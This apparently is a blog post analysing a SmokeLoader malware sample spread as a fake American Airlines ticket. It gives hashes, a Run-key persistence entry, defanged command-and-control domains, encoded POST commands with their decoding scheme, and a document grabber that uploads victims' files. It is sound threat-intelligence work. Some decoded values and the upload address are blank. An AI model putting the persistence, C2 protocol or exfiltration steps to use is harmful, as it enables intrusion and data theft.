American Airlines Ticket Attachment

Subject: Order#4532104

American Airlines

The sample contained a SmokeLoader payload within attachment. It had following properties:

File: Ticket_American_Airlines_ID3457-144.exe
MD5: 0b2b79189fd6e04a644c647cbebdd757
Size: 1,35,168 bytes
Path: C:\Documents and Settings\nightrover\Application Data\DD8F30.exe

The following registry key is created to ensure the file starts with each system reboot:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Microsoft Windows
“C:\Documents and Settings\nightrover\Application Data\DD8F30.exe”

The following network traffic is observed, related to Smoke Loader (All “smk=” commands can be decoded with Base64 and then XOR’ed with 0x02):


Likely a connectivity test.

  • POST ofalaskas14[.]ru/wen/index.php

The infected host POSTs the following to the server

  • POST ofalaskas14[.]ru/wen/index.php

Data posted is ‘smk=AmFvZj9lZ3ZycG16ew==’ which decodes to ‘.cmd=getproxy’
This downloads encoded data, likely the SOCKS proxy module available as an add-on for Smoke Loader.

  • POST ofalaskas14[.]ru/wen/index.php

Data posted is ‘smk=AmFvZj9lZ3ZxbWFpcSRubWVrbD9EQTtBNkZEMjM0MUYwOkc6MkMzRzFENTo2MDY2NjBBQTAxRkY6RDEyJHJtcHY/MTE0NjA=’ which decodes to
This likely indicates the SOCKS proxy port.

  • POST ofalaskas14[.]ru/wen/index.php

Data posted is ‘smk=AmFvZj9lZ3ZubWNmJG5tZWtsP0RBO0E2RkQyMzQxRjA6RzoyQzNHMUQ1OjYwNjY2MEFBMDFGRjpEMTIkcWduPzM7b2NwJHRncD83LDMkYGt2cT8yJGRrbGNuP21p’ which decodes to
The server returns ‘Smk6’ which indicates that there are 6 files for download.

  • POST tropic18854[.]ru/ddn/index.php

Data posted is ‘AmFvZj9lZ3ZubWNmJG5tZWtsP0RBO0E2RkQyMzQxRjA6RzoyQzNHMUQ1OjYwNjY2MEFBMDFGRjpEMTIkcWduPzM7b2NwJHRncD83LDMkYGt2cT8yJGRrbmc/cA==’ which decodes to
The server redirects to the first file to be downloaded via a location header. This is repeated for each of the 6 files where file=0 increases with each download.

One of the file SmokeLoader downloads is a Office Document grabber. During our analysis we observed it searching for all Office documents, archiving them as a ZIP file and uploading to the server shown below:

It then uploads an archive made of all the .XLS and .DOC files collected from victim machine to – – group_id=1486090109 – password=nohifoaa

The following files were downloaded:


MD5: e7501c4a9d19135a6d6f357216289324
Size: 4,09,600 bytes
AV detection indicates that it is likely a rogue AV variant.


MD5: 864f1cf79e92631168797a7ed8cb7c99
Size: 6,31,808 bytes
AV detection indicated that it is likely a Downloader/Backdoor

Observed network communications include the following:

  • /?s5e55k=%96%9B%A1%D0%D6%AA%91%94c%A4m%96%C8%C6kf%A2%98%AA%DA%AC%CFkjac%94%A8%A5%AC%99%9Df%5B%E2%E8%A2%E7%E5%CA%C4T%A8%9A%D5vf%95%9BjY%D7%A5%E0%B4%D8%D9f%88%84T%D0%D8%D1%B0v%9Dmx%9F%A8%AA%A1%B3%A2%BAtge%B4ny%99%A7%7Dk%A1%7B%B2%AC%B8%9Fjhuo%9A%95%DF%D8%A8%A2ee%9B%A2%95%A3%A0%A2%A4%5Ecb%A1ic%93%95ic%9B%5D%EF%B4%A3%9Bica%5E%9B%A6%91

Both these requests resulted in 301 Moved Permanently – Location: hxxp://


Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: